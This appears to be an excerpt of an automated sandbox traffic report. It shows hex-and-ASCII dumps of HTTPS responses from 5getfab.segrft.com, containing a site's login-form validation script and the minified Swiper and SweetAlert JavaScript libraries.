                                                      2025-01-12 23:47:46 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 62 6a 2e 73 69 62 6c 69 6e 67 73 28 22 68 34 22 29 2e 73 68 6f 77 28 29 2e 68 74 6d 6c 28 27 e4 b8 8d e8 83 bd e4 b8 ba e7 a9 ba 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 62 6a 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 73 68 6f 77 28 29 2e 61 74 74 72 28 22 73 72 63 22 2c 20 22 69 6d 61 67 65 73 2f 72 65 64 5f 69 63 6f 6e 2e 70 6e 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 28 22 23 71 75 65 73 74 69 6f 6e 22 29 2e
                                                      Data Ascii: b = true; } }else{ obj.siblings("h4").show().html(''); obj.parent().find("img").show().attr("src", "images/red_icon.png"); b = false; } } $("#question").
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 20 20 24 28 22 23 4c 6f 67 69 6e 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 68 65 63 6b 4c 6f 67 69 6e 2e 63 68 65 63 6b 41 63 63 6f 75 6e 74 28 24 28 22 23 61 63 63 6f 75 6e 74 69 64 22 29 29 20 26 26 20 63 68 65 63 6b 4c 6f 67 69 6e 2e 63 68 65 63 6b 41 63 63 6f 75 6e 74 50 61 73 73 77 6f 72 64 28 24 28 22 23 61 63 63 70 61 73 73 77 6f 72 64 22 29 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 70 6f 70 75 70 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 27 29 2e 74 72 69 67 67 65 72 28 27 73 75 62 6d 69 74 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20
                                                      Data Ascii: $("#Login").click(function() { if (checkLogin.checkAccount($("#accountid")) && checkLogin.checkAccountPassword($("#accpassword"))) { $('#popup_login_form').trigger('submit'); } });
                                                      2025-01-12 23:47:46 UTC3410INData Raw: 62 6a 2e 73 69 62 6c 69 6e 67 73 28 22 68 34 22 29 2e 73 68 6f 77 28 29 2e 68 74 6d 6c 28 27 e9 aa 8c e8 af 81 e7 a0 81 e4 b8 8d e8 83 bd e4 b8 ba e7 a9 ba 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 62 6a 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 73 68 6f 77 28 29 2e 61 74 74 72 28 22 73 72 63 22 2c 20 22 69 6d 61 67 65 73 2f 72 65 64 5f 69 63 6f 6e 2e 70 6e 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 28 22 2e 63 68 6f 73 65 66 73 20 6c 61 62 65 6c 2e 6f 6e 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 76 61 6c 75 65 22 29 20 3d 3d 20 32 29 20 7b 0d 0a
                                                      Data Ascii: bj.siblings("h4").show().html(''); obj.parent().find("img").show().attr("src", "images/red_icon.png"); return false; } if ($(".chosefs label.on").attr("data-value") == 2) {


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.44977320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC643OUTGET /plus/plugin/js/swiper.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:46 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:46 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 114405
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1bee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:46 UTC3776INData Raw: 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 34 2e 31 2e 30 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 73 77 69 70 65 72 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 31 38 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 4a 61 6e 75 61 72 79 20 31 33 2c
                                                      Data Ascii: /** * Swiper 4.1.0 * Most modern mobile touch slider and framework with hardware accelerated transitions * http://www.idangero.us/swiper/ * * Copyright 2014-2018 Vladimir Kharlampidi * * Released under the MIT License * * Released on: January 13,
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 74 68 3b 68 2b 3d 31 29 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 7c 7c 28 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 3d 5b 5d 29 2c 75 2e 64 6f 6d 37 4c 69 73 74 65 6e 65 72 73 2e 70 75 73 68 28 7b 74 79 70 65 3a 61 2c 6c 69 73 74 65 6e 65 72 3a 6e 2c 70 72 6f 78 79 4c 69 73 74 65 6e 65 72 3a 64 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 5b 68 5d 2c 64 2c 6f 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 6f 66 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 76 61 72 20 69 2c 73 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 72 3d 65 5b 32 5d 2c 6e 3d 65 5b 33 5d 3b 22 66 75 6e 63
                                                      Data Ascii: th;h+=1)u.dom7Listeners||(u.dom7Listeners=[]),u.dom7Listeners.push({type:a,listener:n,proxyListener:d}),u.addEventListener(p[h],d,o)}return this},off:function(){for(var e=[],t=arguments.length;t--;)e[t]=arguments[t];var i,s=e[0],a=e[1],r=e[2],n=e[3];"func
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 65 6e 64 43 68 69 6c 64 28 6e 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 65 6c 73 65 20 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 3d 31 29 74 68 69 73 5b 72 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 5b 6f 5d 29 3b 65 6c 73 65 20 74 68 69 73 5b 72 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 73 3b 66 6f 72 28 69 3d 30 3b 69 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 2b 3d 31 29 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b
                                                      Data Ascii: endChild(n.firstChild)}else if(t instanceof e)for(var o=0;o<t.length;o+=1)this[r].appendChild(t[o]);else this[r].appendChild(t)}return this},prepend:function(t){var i,s;for(i=0;i<this.length;i+=1)if("string"==typeof t){var a=document.createElement("div");
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 6f 6e 73 74 72 75 63 74 6f 72 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 2c 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 69 3d 4f 62 6a 65 63 74 28 65 5b 30 5d 29 2c 73 3d 31 3b 73 3c 65 2e 6c 65 6e 67 74 68 3b 73 2b 3d 31 29 7b 76 61 72 20 61 3d 65 5b 73 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 26 26 6e 75 6c 6c 21 3d 3d 61 29 66 6f 72 28 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4f 62 6a 65 63 74 28 61 29 29 2c 6e 3d 30 2c 6f 3d 72 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 3d 31 29 7b 76 61 72 20 64 3d 72 5b 6e
                                                      Data Ascii: onstructor&&e.constructor===Object},extend:function(){for(var e=[],t=arguments.length;t--;)e[t]=arguments[t];for(var i=Object(e[0]),s=1;s<e.length;s+=1){var a=e[s];if(void 0!==a&&null!==a)for(var r=Object.keys(Object(a)),n=0,o=r.length;n<o;n+=1){var d=r[n
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 28 73 2c 74 29 2c 73 7d 2c 70 2e 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 3b 69 2d 2d 20 3e 30 3b 29 74 5b 69 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 69 2b 31 5d 3b 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 28 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 2e 69 6e 73 74 61 6c 6c 4d 6f 64 75 6c 65 28 65 29 7d 29 2c 73 29 3a 73 2e 69 6e 73 74 61 6c 6c 4d 6f 64 75 6c 65 2e 61 70 70 6c 79 28 73 2c 5b 65 5d 2e 63 6f 6e 63 61 74 28 74 29 29 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 70 2c 63 29 3b 76 61 72 20 75 3d 7b 75
                                                      Data Ascii: (s,t),s},p.use=function(e){for(var t=[],i=arguments.length-1;i-- >0;)t[i]=arguments[i+1];var s=this;return Array.isArray(e)?(e.forEach(function(e){return s.installModule(e)}),s):s.installModule.apply(s,[e].concat(t))},Object.defineProperties(p,c);var u={u
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 5b 5d 2c 69 3d 30 3b 69 66 28 22 61 75 74 6f 22 21 3d 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 26 26 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 3e 31 29 66 6f 72 28 65 3d 30 3b 65 3c 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 29 3b 65 2b 3d 31 29 7b 76 61 72 20 73 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 2b 65 3b 69 66 28 73 3e 74 68 69 73 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 29 62 72 65 61 6b 3b 74 2e 70 75 73 68 28 74 68 69 73 2e 73 6c 69 64 65 73 2e 65 71 28 73 29 5b 30 5d 29 7d 65 6c 73 65 20 74 2e 70 75 73 68 28 74 68 69 73 2e 73 6c 69
                                                      Data Ascii: ight:function(){var e,t=[],i=0;if("auto"!==this.params.slidesPerView&&this.params.slidesPerView>1)for(e=0;e<Math.ceil(this.params.slidesPerView);e+=1){var s=this.activeIndex+e;if(s>this.slides.length)break;t.push(this.slides.eq(s)[0])}else t.push(this.sli
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 74 28 22 73 6c 69 64 65 43 68 61 6e 67 65 22 29 7d 65 6c 73 65 20 74 21 3d 3d 64 26 26 28 74 68 69 73 2e 73 6e 61 70 49 6e 64 65 78 3d 74 2c 74 68 69 73 2e 65 6d 69 74 28 22 73 6e 61 70 49 6e 64 65 78 43 68 61 6e 67 65 22 29 29 7d 2c 75 70 64 61 74 65 43 6c 69 63 6b 65 64 53 6c 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 70 61 72 61 6d 73 2c 73 3d 74 28 65 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e 22 2b 69 2e 73 6c 69 64 65 43 6c 61 73 73 29 5b 30 5d 2c 61 3d 21 31 3b 69 66 28 73 29 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 68 69 73 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 3b 72 2b 3d 31 29 74 68 69 73 2e 73 6c 69 64 65 73 5b 72 5d 3d 3d 3d 73 26 26 28 61 3d 21 30 29 3b 69 66 28 21 73 7c 7c 21 61 29
                                                      Data Ascii: t("slideChange")}else t!==d&&(this.snapIndex=t,this.emit("snapIndexChange"))},updateClickedSlide:function(e){var i=this.params,s=t(e.target).closest("."+i.slideClass)[0],a=!1;if(s)for(var r=0;r<this.slides.length;r+=1)this.slides[r]===s&&(a=!0);if(!s||!a)
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 69 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 3d 74 68 69 73 2c 73 3d 69 2e 70 61 72 61 6d 73 2c 61 3d 69 2e 24 77 72 61 70 70 65 72 45 6c 2c 72 3d 22 61 75 74 6f 22 3d 3d 3d 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 3f 69 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 44 79 6e 61 6d 69 63 28 29 3a 73 2e 73 6c 69 64 65 73 50 65 72 56 69 65 77 2c 6e 3d 69 2e 63 6c 69 63 6b 65 64 49 6e 64 65 78 3b 69 66 28 73 2e 6c 6f 6f 70 29 7b 69 66 28 69 2e 61 6e 69 6d 61 74 69 6e 67 29 72 65 74 75 72 6e 3b 65 3d 70 61 72 73 65 49 6e 74 28 74 28 69 2e 63 6c 69 63 6b 65 64 53 6c 69 64 65 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6e 64 65 78 22 29 2c 31 30 29 2c 73 2e 63 65 6e 74 65 72 65 64 53 6c 69 64 65 73 3f 6e
                                                      Data Ascii: ide:function(){var e,i=this,s=i.params,a=i.$wrapperEl,r="auto"===s.slidesPerView?i.slidesPerViewDynamic():s.slidesPerView,n=i.clickedIndex;if(s.loop){if(i.animating)return;e=parseInt(t(i.clickedSlide).attr("data-swiper-slide-index"),10),s.centeredSlides?n
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 2c 6e 3d 21 61 26 26 65 2e 6d 61 74 63 68 28 2f 28 69 50 68 6f 6e 65 5c 73 4f 53 7c 69 4f 53 29 5c 73 28 5b 5c 64 5f 5d 2b 29 2f 29 3b 69 66 28 69 26 26 28 74 2e 6f 73 3d 22 77 69 6e 64 6f 77 73 22 2c 74 2e 6f 73 56 65 72 73 69 6f 6e 3d 69 5b 32 5d 2c 74 2e 77 69 6e 64 6f 77 73 3d 21 30 29 2c 73 26 26 21 69 26 26 28 74 2e 6f 73 3d 22 61 6e 64 72 6f 69 64 22 2c 74 2e 6f 73 56 65 72 73 69 6f 6e 3d 73 5b 32 5d 2c 74 2e 61 6e 64 72 6f 69 64 3d 21 30 2c 74 2e 61 6e 64 72 6f 69 64 43 68 72 6f 6d 65 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3e 3d 30 29 2c 28 61 7c 7c 6e 7c 7c 72 29 26 26 28 74 2e 6f 73 3d 22 69 6f 73 22 2c 74 2e 69 6f 73 3d 21 30 29 2c 6e 26 26 21 72 26 26 28 74 2e 6f 73 56 65 72 73 69
                                                      Data Ascii: ,n=!a&&e.match(/(iPhone\sOS|iOS)\s([\d_]+)/);if(i&&(t.os="windows",t.osVersion=i[2],t.windows=!0),s&&!i&&(t.os="android",t.osVersion=s[2],t.android=!0,t.androidChrome=e.toLowerCase().indexOf("chrome")>=0),(a||n||r)&&(t.os="ios",t.ios=!0),n&&!r&&(t.osVersi
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 30 3b 76 61 72 20 66 3d 74 68 69 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 28 29 3f 63 3a 75 3b 61 2e 64 69 66 66 3d 66 2c 66 2a 3d 73 2e 74 6f 75 63 68 52 61 74 69 6f 2c 72 26 26 28 66 3d 2d 66 29 2c 74 68 69 73 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 3d 66 3e 30 3f 22 70 72 65 76 22 3a 22 6e 65 78 74 22 2c 69 2e 63 75 72 72 65 6e 74 54 72 61 6e 73 6c 61 74 65 3d 66 2b 69 2e 73 74 61 72 74 54 72 61 6e 73 6c 61 74 65 3b 76 61 72 20 76 3d 21 30 2c 6d 3d 73 2e 72 65 73 69 73 74 61 6e 63 65 52 61 74 69 6f 3b 69 66 28 73 2e 74 6f 75 63 68 52 65 6c 65 61 73 65 4f 6e 45 64 67 65 73 26 26 28 6d 3d 30 29 2c 66 3e 30 26 26 69 2e 63 75 72 72 65 6e 74 54 72 61 6e 73 6c 61 74 65 3e 74 68 69 73 2e 6d 69 6e 54 72 61 6e 73 6c 61 74 65 28 29 3f 28 76 3d 21 31 2c 73
                                                      Data Ascii: 0;var f=this.isHorizontal()?c:u;a.diff=f,f*=s.touchRatio,r&&(f=-f),this.swipeDirection=f>0?"prev":"next",i.currentTranslate=f+i.startTranslate;var v=!0,m=s.resistanceRatio;if(s.touchReleaseOnEdges&&(m=0),f>0&&i.currentTranslate>this.minTranslate()?(v=!1,s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.44977520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:46 UTC647OUTGET /plus/plugin/js/sweetalert.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:46 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:46 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 16994
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-4262"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:46 UTC3778INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 73 2c 6c 29 7b 69 66 28 21 74 5b 73 5d 29 7b 69 66 28 21 65 5b 73 5d 29 7b 76 61 72 20 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 6c 26 26 69 29 72 65 74 75 72 6e 20 69 28 73 2c 21 30 29 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 28 73 2c 21 30 29 3b 76 61 72 20 75 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 73 2b 22 27 22 29 3b 74 68 72 6f 77 20 75 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 75 7d 76 61 72 20
                                                      Data Ascii: !function(e,t,n){"use strict";!function o(e,t,n){function a(s,l){if(!t[s]){if(!e[s]){var i="function"==typeof require&&require;if(!l&&i)return i(s,!0);if(r)return r(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 29 3b 28 30 2c 64 2e 72 65 6d 6f 76 65 43 6c 61 73 73 29 28 6e 2c 22 73 68 6f 77 22 29 3b 76 61 72 20 6f 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 61 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 29 3b 28 30 2c 64 2e 72 65 6d 6f 76 65 43 6c 61 73 73 29 28 6f 2c 22 73 68 6f 77 22 29 7d 2c 75 2e 64 69 73 61 62 6c 65 42 75 74 74 6f 6e 73 3d 63 2e 64 69 73 61 62 6c 65 42 75 74 74 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 30 2c 70 2e 67 65 74 4d 6f 64 61 6c 29 28 29 2c 6e 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 62 75 74 74 6f 6e 2e 63 6f 6e 66 69 72 6d 22 29 2c 6f 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 62 75 74 74 6f 6e 2e 63 61 6e 63 65 6c 22 29 3b 6e 2e 64 69 73 61 62 6c 65 64 3d
                                                      Data Ascii: );(0,d.removeClass)(n,"show");var o=t.querySelector(".sa-error-container");(0,d.removeClass)(o,"show")},u.disableButtons=c.disableButtons=function(e){var t=(0,p.getModal)(),n=t.querySelector("button.confirm"),o=t.querySelector("button.cancel");n.disabled=
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 74 54 69 6d 65 6f 75 74 28 61 2c 74 29 7d 3b 6f 28 29 7d 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 7c 7c 31 36 2c 65 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 31 3b 76 61 72 20 6e 3d 2b 6e 65 77 20 44 61 74 65 2c 6f 3d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 65 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 2b 65 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 2d 28 6e 65 77 20 44 61 74 65 2d 6e 29 2f 31 30 30 2c 6e 3d 2b 6e 65 77 20 44 61 74 65 2c 2b 65 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3e 30 3f 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 74 29 3a 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 3b 6f 28 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 6e
                                                      Data Ascii: tTimeout(a,t)};o()}e.style.display="block"},y=function(e,t){t=t||16,e.style.opacity=1;var n=+new Date,o=function a(){e.style.opacity=+e.style.opacity-(new Date-n)/100,n=+new Date,+e.style.opacity>0?setTimeout(a,t):e.style.display="none"};o()},b=function(n
                                                      2025-01-12 23:47:46 UTC4096INData Raw: 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 61 2d 6c 69 6e 65 20 73 61 2d 6c 6f 6e 67 22 3e 3c 2f 73 70 61 6e 3e 5c 6e 5c 6e 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 61 2d 66 69 78 22 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 61 2d 69 63 6f 6e 20 73 61 2d 63 75 73 74 6f 6d 22 3e 3c 2f 64 69 76 3e 3c 68 32 3e 54 69 74 6c 65 3c 2f 68 32 3e 5c 6e 20 20 20 20 3c 70 3e 54 65 78 74 3c 2f 70 3e 5c 6e 20 20 20 20 3c 66 69 65 6c 64 73 65 74 3e 5c 6e 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 74 61 62 49 6e 64 65 78 3d 22 33 22 20 2f 3e 5c 6e
                                                      Data Ascii: <span class="sa-line sa-long"></span>\n\n <div class="sa-placeholder"></div>\n <div class="sa-fix"></div>\n </div><div class="sa-icon sa-custom"></div><h2>Title</h2>\n <p>Text</p>\n <fieldset>\n <input type="text" tabIndex="3" />\n
                                                      2025-01-12 23:47:46 UTC928INData Raw: 6f 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 28 65 5b 6e 5d 3d 74 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2f 5e 23 3f 28 5b 61 2d 66 5c 64 5d 7b 32 7d 29 28 5b 61 2d 66 5c 64 5d 7b 32 7d 29 28 5b 61 2d 66 5c 64 5d 7b 32 7d 29 24 2f 69 2e 65 78 65 63 28 65 29 3b 72 65 74 75 72 6e 20 74 3f 70 61 72 73 65 49 6e 74 28 74 5b 31 5d 2c 31 36 29 2b 22 2c 20 22 2b 70 61 72 73 65 49 6e 74 28 74 5b 32 5d 2c 31 36 29 2b 22 